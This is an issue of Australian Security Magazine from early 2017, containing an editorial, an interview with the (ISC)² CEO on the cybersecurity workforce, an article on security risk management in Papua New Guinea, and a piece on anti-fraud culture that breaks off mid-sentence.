Print Post Approved PP100003227
THE COUNTRY’S LEADING GOVERNMENT AND CORPORATE SECURITY MAGAZINE | www.australiansecuritymagazine.com.au Feb/March 2017
Vehicle attacks: Ten minute traffic deployment
Australia just can’t hack it
The Chinese NY Bank Cyber Heist
Practical steps for building a cyber resilient enterprise
What it takes to be a smart city
SPECIAL REVIEW Canalys Channels Forum - Macau
Is privacy a lost cause
The role of cyber insurance
PLUS $8.95 INC. GST
TechTime, Quick Q&A, Book reviews, Cyber Security and much more...
Contents Editor's Desk 3 Quick Q @ A with David Shearer
International Operational security management structures Executive Editor / Director Chris Cubbage Director / Co-founder David Matrai
Corporate Security Anti fraud and corruption
Cultivating vigilant behaviour in people
Frontline Ten minute traffic security deployment
Art Director Stefan Babij
Smart City Series What it takes to be a 'smart city'
Correspondents Tony Campbell Sarosh Bana
CCTV Feature Series About pixel densities
MARKETING AND ADVERTISING T | +61 8 6361 1786
Russia's Cyber War"Options before the US
Are you ready for your next data breach?
The Chinese New Year heist
Australia just cant hack it
Editor's interview: Big data and analytics expert
There is no such thing as a 'safe site'
Women in Security Series : Rachel Falk
Practical steps for building cyber-resilient enterprise
Is privacy a lost cause?
Information and the role of cyber insurance
Canalys Feature Review
TechTime - the latest news and products
Editor's book review
T | +61 8 6361 1786 firstname.lastname@example.org
Copyright ÂŠ 2015 - My Security Media Pty Ltd 286 Alexander Drive, Dianella, WA 6059, Australia T | +61 8 6465 4732 E | email@example.com E: firstname.lastname@example.org All Material appearing in Australian Security Magazine is copyright. Reproduction in whole or part is not permitted without permission in writing from the publisher. The views of contributors are not necessarily those of the publisher. Professional advice should be sought before applying the information to particular circumstances.
Page 14 - Ten minute traffic security deployment
Page 16 - What it takes to be a smart city
CONNECT WITH US
www.twitter.com/apsmagazine www.linkedin.com/groups/Asia-PacificSecurity-Magazine-3378566/about www.youtube.com/user/MySecurityAustralia
Page 24 - Chinese New Year Heist
Like us on Facebook and follow us on Twitter and LinkedIn. We post about new issue releases, feature interviews, events and other topical discussions.
Correspondents* & Contributors
Page 36 - Is privacy a lost cause? www.malaysiasecuritymagazine.com
2 | Australian Security Magazine
Dr Bill Bailey Louis Yau Greg Hamm Vlado Damjanovski Boaz Fischer Ryan Linn
Editor's Desk “There is a major war brewing, a war that’s already global. Every day that we refuse to look at this as what it is — and the scale of it, and really the viciousness of it — will be a day where you will rue that we didn’t act" -
Stephen K. Bannon, 2014
discussing the Islamic State Caliphate. Bannon is now the White House Chief Strategist to US President Donald Trump.
aving an understanding of ‘security’, as both an applied science, as well as an outcome, conjures up an appreciation of human weakness and technical vulnerabilities. Security is also as much a human feeling, as is love and fear. Indeed, feelings of security often sits alongside both, but alongside fear it can be politicised and manipulated, potentially becoming very dangerous. As Prince Charles said recently, “the horrific lessons of the last War seem to be in increasing danger of being forgotten.” Fear is why the public reacts strongly with reassurance to political statements of security around the ‘threat of terrorism’, yet ignores the scores of daily murders and shootings caused as a result of domestic violence and organised crime. Or why US President Donald Trump would prefer to cause worldwide disruption by banning ‘terrorist’ countries, despite reports that none of the seven listed countries have been a direct source of any terrorists, and the ones that do show up repeatedly as a source — especially Pakistan, Saudi Arabia, and Egypt — aren’t on the list. The order on ‘protecting’ Americans from terror attacks also ignores the thousands kills by American guns – over 15,000 gun related deaths in 2016. Yet, it is the very same reason why the NSW Government creates a position for a new Minister for Counter Terrorism, a week following a public admission from the NSW Crime Commission that they have ‘lost the war on drugs.’ As I wrote in my last editorial of 2016, the trends of last year were surely enough to indicate that 2017 is going to be a fascinating year in a security context. The impact of the new US President Donald Trump has been immediate and intense. China is clearly making it known that it will not budge if pushed or tested on the militarisation of the South China Sea – they now have air, land and maritime control of their claimed sovereign territory. Sanctions and military rhetoric has also intensified with Iran and the conflict in Ukraine continues, testing NATO’s patience and the relationship between the US
and the European Council. Much of this is unprecedented and unpredictable – to say the least! Prepare for continued fundamental shifts in world affairs, prepare for expanding military conflict and prepare for these events to have a major impact on Australia and across the Asia Pacific. In this issue, we cover the Russian Hack which is confirmed to have been designed to manipulate the federal election of the world’s most dominant democracy and could well be the defining element in modern human history if Trump continues unabated. Also, highlighted in our interview with David Shearer, CEO of ISC2, “cybersecurity has been increasingly regarded as a strategic international issue affecting all levels of society.” Ryan Linn, Director of Advanced Threats and Countermeasures at Nuix, writes, “cybersecurity is just now becoming a talking point in Australia. For various reasons, I don’t think Australia is quite there yet.” This should be concerning. Nation states and sponsored operatives will use cyber espionage more and more to cause political shifts, disruption, and to gain economic advantage. The inherent weaknesses of email, means it is critical that organisations take proactive measures to secure themselves from simple phishing emails right through to impersonation and weaponised attachments. Malware can be easily bought online, meaning that criminals with little to no computer skills are free to send infected emails. It is also vital that organisations look to train employees to be and remain alert as the gatekeepers into an organisation. This extends to the CEO, CFO and Board Chair. It is the top down approach most needed. It is also incumbent on all security professionals, be they in the physical or cyber domain to come together and multi-skill – this requires the state regulators to recognize it is 2017 and a new world – the continued disparity in security industry state regulation and federal legislation yet to pass on mandatory data breach disclosure are both signals Australia remains a long way behind and at risk of succumbing to cyber warfare, espionage and cybercrime
adversaries, as well as planned and opportunistic terror attacks. But worse is the continued horror of domestic violence killings and drug wars lost across the country but no political will, or even a capacity, to deal with it. To demonstrate our commitment to the security domain and the urgently needed focus on cybersecurity, MySecurity Media is launching the Australian Cyber Security Magazine in 2017 – this will be published alongside our existing channels. This edition remains strongly influenced by the cybersecurity threat but we also cover vehicle borne terror attacks, city wide technologies and my book review of Bruce Schneier’s book, Data and Goliath questions the mass surveillance approach, particularly in light of my review of the Canalys Channels Partner ‘Digital First’ Forum in Macau, which highlights the European Union General Data Protection Regulations (GDPR) entering into application in 2018. The wider implications of the GDPR are focused on data privacy controls without country or regional boundaries. This is reflecting the nature of data flows, new technologies and the creative and disruptive business models emerging in new digital economies. How Australia and the APAC region fairs in 2017 politically, economically and technologically is yet to be seen but we’re surely in for an interesting and challenging ride. I doubt we’re sufficiently prepared or have ready the needed public mindset which resists fear and remains security aware. And on that note, as always, we provide plenty of thought provoking material and there is so much more to touch on. Stay tuned with us as we continue to explore, educate, entertain and most importantly, engage. Yours sincerely, Chris Cubbage CPP, RSecP, GAICD Executive Editor
Australian Security Magazine | 3
....with David Shearer
CEO of international cybersecurity certification organisation, (ISC)². ASM: It’s been an interesting year in terms of cybersecurity - what have been the highlights for (ISC)²? David Shearer (DS) It’s also been an interesting year for (ISC)². In 2016, cybersecurity has been increasingly regarded as a strategic international issue affecting all levels of society. By the year 2020, the number of networked devices (the internet of things) will outnumber people by six to one, transforming current conceptions of the internet. (Source: UN, Comprehensive study on cybercrime, UNODC, Vienna, 2013.) As mobile data usage and traffic has been increasing rapidly and substantially, faster than prevention technology - cybersecurity measures and policies, countries worldwide are at a higher risk of facing information security challenges more than ever before. Talent capacity building has been one of the most discussed topics in the global arena. No matter where I travelled this year—the Americas, Europe, Asia—I heard the term ‘talent capacity building’ in almost all discussion forums. (ISC)² members remain at the forefront of cybersecurity, and since 2004, our Global Information Security Workforce Study continues to validate this significant talent shortage. Our members are overworked based on the limited number of qualified people in the workforce and consequently, many are falling behind in their duties. This is compounded by the lack of new people entering the profession. In addition, our members are increasingly involved in a range of audits that consume significant amounts of time, at the expense of operational cybersecurity requirements and responsibilities. In 2016, we have tried to address the workforce shortage by speaking with various government agencies about how (ISC)² can collaborate with them to enhance the quality of the cybersecurity workforce and increase the numbers in the professional pipeline. Our recent signing of a memorandum of understanding (MOU) with Cyber Security Agency of Singapore (CSA) is one of those moves. The MOU allows CSA and (ISC)² to increase public cybersecurity awareness, and complement existing efforts in the development and maintenance of the cybersecurity competency framework in Singapore. At the same time, we asked our global regional offices to expand our International Academic Program (IAP) to a network of university partners, to provide them with access to the professional knowledge maintained by (ISC)²’s Common Body of Knowledge (CBK®)
4 | Australian Security Magazine
so that their graduates will be equipped with much-needed cybersecurity skills. We also advise the course designers and course accreditors to help them embed cybersecurity into degree modules and associated syllabi. The Associate of (ISC)² program has been instrumental in helping over 15,000 people become full members since 2009. Our associate program provides a career path for individuals that do not have the requisite experience requirements, but are able to pass one of our rigorous exams. For example, the CISSP requires 5 years of experience, but an Associate of (ISC)² has six years to get the required experience. By using the (ISC)² digital badge, our Associates can validate that they passed our exam, and are progressing toward certification. Employers can look to Associates of (ISC)² as a way of building talent capacity by giving our Associates a chance to get the required experience while growing with their organizations. At (ISC)² we believe that when it comes to cybersecurity, we need to look after the most vulnerable members of society - children and seniors – and do everything we can to ensure their safety. We’re trying to reach young hearts and minds through our Safe and Secure Online program, and we have engaged Garfield as our ‘spokes-cat’ to leverage the awareness programs to show young children that cybersecurity is an exciting field. Garfield and Friends brings international recognition to (ISC)²’s program
for cyber security education for children. www. safeandsecureonline.org ASM: How have the new services that have come online this year been received by your members? DS: In 2016 we focused on increasing member benefits, including forming strategic partnerships with industry to help position our members for success. We recognize that many of our members struggle to have the right level of staff, and they seldom have all the tools they need, like Security Information and Event Management (SIEM) technologies. Some of our members tell us they spend more time chasing vulnerability information and normalizing all the data, instead of actually patching and remediating vulnerabilities. For these members, we teamed up with Cytenna to bring Vulnerability Central to our members at no cost. Vulnerability Central empowers members to spend less time researching and normalizing vulnerability data and more time on targeted vulnerability remediation. In addition, we partnered with the Institute for Applied Network Security (IANS), providing members access to their CISO Impact Diagnostics. We have a partnership with UCF and their Common Controls Hub, which helps our members make sense of more than 90,000 individual mandates from 800-plus laws and standards around the globe. We also are trying
to help our members have more business-based discussion about the value of cyber, information, software and infrastructure security through partnerships with PivotPoint and their CyVar product that focuses on cyber risk valuation. We also have a partnership with RiskLens for discounted FAIR training and discounts on their tools that are based on the open FAIR standard. We want the customer experience from candidate to member to be outstanding and continually improving. An endorsement process that is too convoluted and takes too long to complete does not provide a candidate on the path to membership with a great experience. We have just deployed a new online endorsement process that has cut the processing time by 49%, and we’re going to continue to look at other ways to improve our business processes to the betterment of our members. Earlier this year we issued digital badges to our members. Digital badges make it convenient for employers and recruiters to validate the status of our members. It also helps members promote their competencies and capabilities to current and potential employers. ASM: The cyber security skills gap seems to be in the news every week. What measures need to be taken in government and industry to address this? DS: At (ISC)² our position has always been that cybersecurity is a global problem that requires a global response. Governments can absolutely play a key role in cybersecurity initiatives, such as security intelligence sharing and technology innovation transfers to the private sector. Governments have the ability to become security innovation centres and help move industry to new levels, but their role in their own intelligencegathering efforts hold back the good it can do for its citizens. Legislative branches also wield the power to compel organizations to meet standards and set mandates for incident response and consumer protections. While indirectly affecting security, these actions help organizations quantify and address security risks lest they incur direct government intervention. From a talent perspective, governments are struggling more than most because private industry is recruiting heavily and poaching government security staff faster than they can be replaced. Thus, governments have a large stake in developing methods to expand pipelines for security talent through academic partnerships and public-private ventures. ASM: In some countries around the world, the idea of establishing information security as a regulated and governed profession has been mooted; what’s going on in the US and what are the views of (ISC)²?
DS: While cybersecurity is an international issue affecting all levels of society, we do not see a move towards licensure in the United States. However, we see there is a trend for compilation of a national competency framework and organizations are mapping towards that framework. For example, the DOD 8570 directive is mapped against the National Cybersecurity Workforce Framework (aka the NICE Framework) by NIST. In the U.S., Department of Defense (DoD) 8570 directive was published in 2005 to address the concern of unqualified personnel performing very critical cyber functions. DoD 8570 directive requires its information assurance (IA) workers to obtain a commercial certification that has been accredited by ANSI or equivalent authorized body under the global ISO/IEC 17024 standard. This DoD-wide policy was made official in August 2004 and approved for implementation in December 2005. ISO/IEC 17024 establishes a global benchmark for the certification of personnel. (ISC)2 was the first organization within the information technology sector to earn ISO/IEC 17024 accreditation for personnel certification for the CISSP. Now the SSCP, CAP, CSSLP, CISSPISSAP, ISSEP, ISSMP certifications have also been approved to the ISO/IEC Standard 17024. In Asia, the National Infocomm Competency Framework (NICF), developed by IMDA and SkillsFuture in Singapore in close collaboration with the infocomm industry, is a national infocomm roadmap that articulates the competency requirements of key Infocomm professionals. Infocomm professionals and employers can leverage the NICF to determine the types of skills and competencies required for various infocomm jobs and to develop training strategies for the professionals to acquire these skills through accredited training providers. The NICF is an open system which allows international certifications and which also promotes knowledge exchange. CISSP, CSSLP and CCSP mapping to NICF has been approved. Over the years we have witnessed many efforts by governments to create local standards or certifications for security professionals. We have advocated against this because while there may be good intentions, carrying the burden of maintaining these types of programs can be a drag on the government and programs can quickly become out-of-date or take a myopic approach to be valuable. (ISC)² spends a great deal of time and energy maintaining the body of knowledge on which our certifications are based, and we maintain an international cadre of experts to help keep them up-to-date. The body of knowledge we create transcends borders and is a great place to build from when it is applied to our certifications or even academic security curriculum.
ASM: Looking forward, what are your tactical and strategic aims for the next 12 months and the next 3 years? DS: (ISC)² has begun a modernization initiative called the Digital End-to-End (DETE) program. In the next 12 months, the DETE program will be transforming the way (ISC)² does business. DETE will provide (ISC)² a single pane of glass and cross-functional business information to leverage analytics for comprehensive customer insights to provide more meaningful experiences and uncover new opportunities. I don’t want to give too much away about the program, as we will be announcing it next year. Over the course of the next three years, you will see marked changes in (ISC)² as our DETE Program provides the business enablement we’ve needed to better serve our members and the profession. This will be in the form of better CPE opportunities, with immersion training focused on specific topics critical to keeping our members at the top of their game. (ISC)² will be better able to leverage one of our most valuable assets, the brain trust of our membership, that’s constantly gaining more experience and innovating solutions to handle the seemingly ever-expanding threat landscape. As our membership continues to grow, (ISC)² needs to find new ways to deliver value to our members. We’ll continue to explore business partnerships that can help advance the profession and best serve our hardworking members. ASM: If you had one minute to tell kids about the information security industry as a career option, what would you say? DS: I want to encourage more young people, especially young women, to join our profession. Women are fantastic performers in this profession. I have seen it first-hand. The industry needs young people from both genders and from all walks of life, races and backgrounds. Problems are best solved with diverse teams. Cybersecurity is going to continue to grow in importance. Books like Ted Koppel’s “Lights Out” that highlight the risks related to major cyberattacks will continue to raise awareness. Let’s just hope the global cybersecurity workforce can thwart such an attack. We need bright minds to join the team of good guys and gals trying to counter the growing number of bad actors.
Australian Security Magazine | 5
Operational security management structure for inimical environments By Dr. Bill Bailey
6 | Australian Security Magazine
apua New Guinea (PNG) is an enigma for most companies wishing to set-up and function safely and securely in the country. Anecdotal evidence is rife, as are the newspaper reports, on all aspects of the impact of crime in PNG. Reports related to urban crime point to the underlying reasons including high levels of poverty, healthcare, education and lack of basic infrastructure. The primary factor is considered to be the failure of law and order to bring civil stability, followed by high levels of corruption. The major urban centres of Port Moresby and Lae are considered the most problematic. The ability to develop an operational security management plan is dependent on accurately assessing the actual threat, risks and capability of adversaries to impact on the working environment. Extensive background information needs to be obtained from a number of sources in order to produce a Security Risk and Threat Assessment (SRVTA) (W J. Bailey & Doleman, 2013, p. 57). To be effective in this task requires an understanding of how grave the problem is, and in which specific areas, before any meaningful action can be taken. PNG is not unique as crime is insidious in most developing countries and its impacts affect all sections of society. Therefore, undertaking a comprehensive security, risk and threat assessment is necessary to fully understand the nature and scope of the problem first. A Security Risk Assessment requires an all-inclusive understanding of the social, economic and political factors before successful and meaningful security managed programmes can be implemented or even suggested.. Based upon these criteria, this paper assesses how this indispensable security management process can be accomplished given the far-reaching restraints that are present in undertaking any such process in PNG. The recent trend from incident reports, newspaper articles and anecdotal evidence indicates a steadily rising level of crime in PNG. Changes in socio-economic expectations and the high price of goods have all contributed to increasing social strains. The completion of the PNG-LNG pipeline has seen a decrease in employment that is believed to be associated with increasing levels of crime. This trend in crime is in both urban and rural areas. Without a major investment in infrastructure by the Government to create more employment or another major oil and gas project, which seems less likely at current prices, growing social unrest will rise as will crime.
Risk Situation Port Moresby was ranked as one of the world’s least liveable cities scoring 138 out of 140 on list prepared by the Economist (Economist Intelliegence Unit, 2016). However, sometimes there is no choice for some who need to live here for work purposes, which is why it is included in the Economist list. Figure 1, indicates that even though the security risk is at 61D, it is not the most severe indicating that is can be managed with sufficient safeguards. Perhaps what is more concerning is the EIU’s rating for Government effectiveness at 68D and Infrastructure, which has fallen from 78 D, in 2015 to 81 E. Both of these high scores show increased concern from analysts regarding the situation in PNG. Creating an operational security management structure It is commonly accepted that operating in PNG presents challenges to companies, but these are not insurmountable, when compared to operations in Iraq, Algeria, or other conflict zones. PNG is not a conflict zone, nor does it have a terrorist or civil war problem. The problems are predominately crime related based upon social inequality and aggressive cultural behaviour. These problems can be managed with sufficient safeguards integrated into the security management structure. However, first there always needs to be a structured, comprehensive risk, threat, vulnerability and criticality assessment conducted in order to develop the necessary safeguards. Understanding what is meant by risk and how to define it is crucial to the process. AS/NZS 31000:2009 considers it to be the “effect of uncertainty on objectives…[when] an effect is a deviation from the expected-positive and/or negative”(Standards Australia, 2009). Kaplan (1981) states “we are not able in life to avoid risk but only to choose between risks” and in order to accomplish this we need to quantify risk by using what Kaplan defines as a set of risk triplets: scenario, probability, and consequences. • What could happen, when and how? (i.e. What can go wrong?) • How likely is it that it will happen? ( i.e. likelihood) • If it does happen, what are the consequences?
International The Risk scenarios and ratings from EIU are b)
Targeted (sabotage, hijacking, assassination, kidnapping, armed incursion, etc); c) Operating environment including local flash points, landowner disputes or grievances; d) Inadequacy of essential services or infrastructure, including police support; e) Natural event (fire, earthquake, flood, storm etc). 3. Vulnerability assessment to determine the extent and appropriateness of loss prevention and protection measures currently being considered or in place.
"It is commonly accepted that operating in PNG presents challenges to companies, but these are not
Figure 1 Risk Scenarios and rankings (Economist Intelliegence Unit, 2016)
When analysing this approach, the important concept to bear in mind is the relationship consequence has in the whole assessment process. Ezell (2007) argues this further where, “vulnerability highlights the notion of susceptibility to a scenario, whereas risk focuses on the severity of consequences within the context of a scenario”; proposing a series of definitions to accommodate this concept . It is important to understand, “vulnerability assessments are not the same as risk assessments”, because “risk assessments are employed to help understand what can go wrong, estimate the likelihood and the consequences, and to develop risk mitigation strategies to counter risk.”(Ezell, Farr, & Wiese, 2000). Consequences are therefore the prime concern for dealing with threats and hazards in relation to the potential damaged caused and how difficult it might be to put right. A security vulnerability assessment is far more comprehensive than many managers appreciate as: Only by taking this more holistic approach can all the risk scenarios be captured and thus dealt with effectively. The starting point is the creation of country security assessment, which is a report to provide a working baseline. This report will include the operating environment, geography, the people, social and economic conditions, government and infrastructure, security, risk, threat and vulnerability assessment. The environment includes access conditions, the roads, water, power, medical facilities, local tribes, community harmony, key figures, in fact anything that can impact on the project and its personnel. There are a number of considerations that can impact on the assessment process (Figure 2) and these will drive the next phase. A single event may have multiple ripple consequences causing a series of knock-on effects. Each of these effects needs to be fully deliberated, understood and mitigation measures built into not only the Security Management Plan, but also the Business Continuity Plan. Therefore, in order to understand the prevailing risk environment, a three-staged approach to a security review should be used: 1. Resource appreciation to identify those assets requiring protection, such as people, property and/or information, as well as criticality analysis in terms of the specific processes, systems and/or activities being undertaken. 2. Threat assessment to determine potential including motivation and capability, which may include; a) Criminal (theft, robbery, assault, vandalism, kidnapping, murder, fraud, etc);
insurmountable, when compared to operations in Iraq, Algeria, or other conflict zones. PNG is not a conflict zone, nor does it have a terrorist or civil war problem." Figure 2 Risk Ripple Considerations (W J. Bailey, 2015)
The ‘Consequence’ should be assessed based upon the criteria above and the: • Comprehensive understanding of current and proposed operations and activities; • Consideration and prioritisation of the most likely worst-case events/consequences affecting the facility, operations, staff, contractors, visitors and the surrounding community; • Characterization of how malevolent acts might occur and assessment of the prevalence of such malevolent acts from defined threat sources, such as criminal, insider, determined vandal, casual vandal and terrorist; • Determination of the most critical assets (targets); identification of their inter-relationships within other assets in the system; identification of the consequences of malevolent acts that could be directed against those assets; and evaluation of the effectiveness of both existing and proposed protection systems. • An appreciation of the limitations of the supply-chainimpact, that is the amount of time needed to replace the damaged assets and the likely cost to the operation. Consequences become the determining factor and are therefore extremely pertinent to the structure employed to manage the security and the safety of the project. Failure to fully address potential negative outcomes could possibly seriously prejudice the project, or worse!
Australian Security Magazine | 7
Proposed Model A security management model for hostile environments was identified in (W.J. Bailey, 2014) as the ‘Aid and Humanitarian agencies security triangle’ (Figure 3) based upon: acceptance, deterrence and protection. Acceptance being foremost, “to remove or reduce the threat by seeking widespread acceptance for one’s presence and work among the populations and from the official and de facto authorities”. Consequently, the company needs to gain wide approval from the local community imbuing them a vested interest in the project. Only by achieving this objective, can the other two pillars of the triangle function (Humanitarian Policy Group, 2010). The proposed model (Figure 4) has been adapted and incorporates an additional arm, ‘Intelligence’, which is deemed essential to developing a robust and successful security management structure. The Inimical Model (Figure 4), also moves protection more forcefully into structured Security Management System (SMS). Integral to SMS is a comprehensive security, risk and threat assessment in order to create the necessary systems based upon documentation, such as a Security Management Plan (SMP and Standard Operating Procedures (SOPs). Furthermore, there is a need to accept that ‘deterrence’ can only be achieved by incorporating a designed security process aided by community support: accomplished by an integrated intelligence network. Intelligence adopts a much wider meaning in this context, as it must be integrated to allow for a free flow of informed information, which is capable of picking up early warning signals should threats arise for any reason. Only by working directly with the community and supporting local initiatives will this have any chance of success. In addition ‘by design’ stemming from the ‘deterrence ‘segment not only means engineered to incorporate access control, detection and technical solutions, but also to ensure the security personnel employed are ‘fit for purpose’; through dedicated professional training. Furthermore, more local senior security management staff need to be employed and for them to gain tertiary degree qualifications to allow them to supervise, develop and administer the security work force. The benefits of using local staff at senior management levels is their ability to empathise communicate and understand complex local issues. In order to achieve these goals more training, mentoring and local recruitment needs to take place.
Figure 3 Adapted from the Aid Agencies Security Triangle (Martin, 1999, p. 4)
Conclusion To operate safely and securely in PNG requires a steadfast approach to ensure a comprehensive security management
8 | Australian Security Magazine
approach is put into place. Incorporating a more inclusive structure by engaging the local community more formally, is seen as a more progressive and sustainable long-term model. To strengthen and underpin this approach, it is necessary to utilise more local PNG citizen managers. In order to accomplish this objective requires employing and empowering more talented citizens for senior management roles. However, with the limited educational opportunities available for tertiary qualifications in security management in PNG, this will also require the Security Industries Authority (SIA) and the government to support the creation of tertiary degrees at universities in PNG. Based upon community support
By design & community support
Structured security management
Integrated local network
Figure 4 Proposed Inimical Security Model (W J. Bailey, 2015)
The model proposed in Figure 4 requires a substantial mind set change as it has to be developed with the acceptance of the community. Most large companies in PNG already have a Community Affairs (CA) section, which deals with all aspects associated with the impacts projects have on local communities and ensures structures for contract negotiation and dispute resolution. Security needs to be aligned more formally and closely with CA, sharing intelligence, networks and resources. PNG is changing and acceptance of predominately expatriate personnel is meeting with more local resistance: it is no longer socially acceptable nor is it operationally sustainable or cost effective. The problems associated with this framework are obvious, consequently there needs to be a change in approach to one that recruits and trains security staff locally. There are a number of advantages and multiple benefits that can be harnessed by employing local people from the community. The difficulties of operating in potentially hostile environments such as PNG requires a more integrated security management structure, which is based upon greater local acceptance by the community coupled with more social engagement leading to better intelligence. The role of security is evolving requiring more inclusive structures capable of ensuring the safety and security of all personnel. The purely defensive model is no longer appropriate and needs to be tempered with the additions as outlined in this article.
Anti fraud and corruption: More of cultivating a culture than prevention & control
I By Prince Lazar Malaysia Country Editor
n today’s world, Fraud is a real serious problem for all organizations to come to grip with, given the fact that regardless of the line of business, employees (and nonemployees also) commit fraud. Technology changes that occur so rapidly have had a cascading effect on Organisations to adapt to the dynamism of this fast paced world. This constant change, whilst good for business in many ways, has also precipitated a steep rise in fraudulent activity, which continues to evolve and requires individuals and businesses to be more prudent in their practices and corporate culture. Fraud can happen anywhere and occurs every day all over the world. While major fraud situations are typically that attract wide media attention and sensations which are disastrous in many ways, especially to the fact that there are huge sums of money lost by all types of businesses as a result of the high number of even smaller frauds that are committed. It is seen that Fraud generally does not occur in a vacuum or isolation; many times it happens within an environment that, while maybe not overtly, is a breeding ground by itself facilitating fraudulent activities. Most frauds are an ongoing work; once it starts it does not stop by itself, and as it
continues, it grows until it gets detected. Fraud is widely prevalent, and more interestingly it’s nearly impossible to identify a potential fraudster with any degree of confidence. The overwhelming majority of people who commit fraud are first-time offenders. It is informed that only 5 percent of fraudsters caught have had a prior fraud conviction. Therefore, no matter how diligently a background check is conducted, the likelihood that it will unmask a person who eventually will steal from the business remains a limitation or challenge. Today, in an increasingly interconnected world, digital technologies that enable business to be conducted in the wink of an eye also help disguise the identities and machinations of the people conducting that business, thereby enabling fraud to become vastly more sophisticated and pervasive. Likewise, fraud’s impact — on businesses, stakeholders and entire economies — has similarly magnified in a profound manner which is a great area of concern. A shaky economy is rife with fraudulent activity which could be internal fraud from employee abuse of purchasing cards to large-scale fraud involving high-value contracts and breaches of controls that could have serious consequences
Australian Security Magazine | 9
The roots of a fraud rarely can be traced to a single unethical individual operating maliciously in a vacuum. A fraud is perpetrated when that person meets a specific environment to businesses. This is precisely the time to step up fraud prevention and detection measures in organisations and entities which support the economy. Some companies/ organisations are on a self-insulated mode as “nothing could go wrong” or take an “it won’t happen to us” approach; others implement controls to try to keep individuals likely to commit fraud from entering the business; and still others outsource the work of combating fraud to external auditors. These tactics and strategies are helpful but are limited. There is a greater need for companies to create lower risk environments for fraud by implementing an effective conducive corporate culture. To do so, organizations first must understand their own corporate ecology — the interrelations between people and their workplace along with the tailor controls to the nature of those systems. In the case that companies incentivized winning and maintaining business to the extent that it closed eyes at law breaking, nurturing an environment in which corruption could flourish. In fact, it is the environment or culture in which company employees leads them to feel that they were not acting abnormally but rather in the best interests of the business while protecting their colleagues’ jobs. The trend of ‘lacks culture’ prevalent could envelop further to improve the revenue thereby boosting the appearance of profitability, and beyond this there could be a pressure to conceal inventory shrinkage losses which is a fraudulent trend. The evolution of this practice has been blamed on the low staffing levels maintained by the organisation, making accurate inventory management difficult. This establishes an environment of scarcity in which deceptive inventory processes are, at best, gets ignored by managers and, at worst, applauded, thereby discouraging those in charge from coming forward. In essence, the corporate ecology or culture would normalize the financial statement fraud, creating fraudsters where, in a different environment, this might not have happened or detected or approved. Internal controls Most organisations will contend that there are sufficient internal controls in place to deter, or even eliminate, fraudulent actions. But, the fact is that internal controls do not entirely prevent fraud. Also, the internal controls need to be reviewed because existing internal controls may no longer be as effective as when they were developed. Businesses changes, and as they do more/different employees are hired which brings dynamic new changes in the Organisational environment.
10 | Australian Security Magazine
It is proven that internal controls generally have weaknesses that can be exploited. There is a need to look at one hundred per cent of the transactions and compare data from different applications and systems and look for matches that occur that really shouldn’t be there or look for duplicate entries in the transactions that indicate either fraudulent activity or perhaps inefficiencies in the system. This has to be done regularly, using automation in high-risk areas so the fraud can be detected/ caught as it occurs and before it escalates. Of course, uncovering some sort of fraudulent activity that has been going on for several years is clearly an important win but finding the issue before it becomes material is going to serve the organization better in the long run. The implementation of internal controls is more effective, and obviously more proactive, than external ex post facto audits. These controls should include management reviews, real-time data analysis of transactions (as close as it could be), robust whistle-blower programs, rigorous client and partner vetting, and a wide range of soft compliance strategies, including tipster hotlines, qualitative interviews with employees and a process for continually collecting employee feedback. Not only do these strategies help companies keep their finger on the pulse of the organization, Anti-fraud policies also help deter potential fraudsters who would take advantage of a company’s lack of such oversight. Bribery & Corruption take centre stage Managing bribery and corruption risk is taking centre stage in corporate boardrooms and becoming one of the most critical compliance challenges for employers. A corruption scandal can destroy an organization’s reputation and result in significant fines, penalties, and even imprisonment. With a changing legal landscape and increasingly aggressive enforcement efforts, it is critical that legal, compliance, and human resources professionals understand the laws that impact their organization, institute robust and meaningful compliance programs, and take aggressive steps to ferret out and prevent corruption in their business dealings. It is not enough to have well-articulated standards and comprehensive procedures for an organisation but it should be embedded in the values of each and every employee through continued training and reinforcement which should be evident in the actions. There should be a monitoring mechanism to check, if the executives specifically are condoning the excessive risk-taking and for dodging regulators who have expressed concerns. This is doesn’t imply that companies should neglect conducting due diligence in their hiring processes. Just like internal and external audits, screening processes are among business first lines of defence and should remain a part of the company’s good housekeeping practices. However the fact is that these practices are not as effective as commonly believed and perceived. The question is that with many of the regulations that are in place, are the corporate executives doing a better job of promoting a culture of compliance? Of course it’s a known fact that ‘Compliance really starts at the top, no matter what regulatory regime you put into place’, but there is renowned trouble in measuring tone at the top which is notoriously difficult. Almost every business - including the most talked
after ‘Enron’ had always said the right thing on paper, via a code of conduct or business ethics, regardless of what the ethical train wrecks or integrity dilution might be happening in the real world. Across industries, governance experts say top executives are generally more willing to spend time and money on cultivating a culture of compliance. There is seemingly a concerted effort on the part of companies about how they can better ensure the right tone or culture that is set for the organisation to prevent fraudulent activities and corruption which is a healthy emerging trend. Protect your organization with a strong compliance culture & training program Any organization seeking to do business lawfully and ethically should have in place a compliance program designed to detect and prevent corrupt payments which at the bare minimum should include: •
POLICIES - A policy or code of business ethics that clearly prohibits the use of bribery to obtain business or a business advantage. PROCEDURES - Detailed procedures, standards, internal accounting controls, reporting mechanisms, and guidance that make sense given the nature and extent of organization’s operations. This includes creating clear reporting channels so that affected parties know how to seek guidance and report potential issues internally in the organization. TRAINING - Training programs designed to provide the appropriate education to employees based on their job responsibilities, geographic location, and line of business. Training should communicate the commitment of the organization and its leaders, and provide clear guidance on how to report questions and concerns. COMMITMENT TO DETECT, INVESTIGATE, AND REMEDY SYSTEMS – there should be a program to detect and investigate suspected violations, to monitor the effectiveness of the program, and to remedy violations. BUSINESS DEVELOPMENT STANDARDS - in order to assist in obtaining or retaining business for or with, or directing any business, the bribe need not be authorized or given to obtain business.
Creating a Fraud-Resistant Culture Every organisation has its own unique way of doing business, usually referred to as the organisational or ‘corporate culture’. This includes the shared values, norms, beliefs and ethical practices which make up the character of the organisation. However, in practice, there can be a great deal of difference between the culture which the organisation appears to be promoting as perceived by external stakeholders, and the culture which employees within the organisation actually perceive. Nowadays, shareholders, regulators and other stakeholders expect executives to promote a culture where everyone is aware of, and supports, the message that the organisation will carry out its business in an honest and ethical way. How resistant that organisation will be to fraud
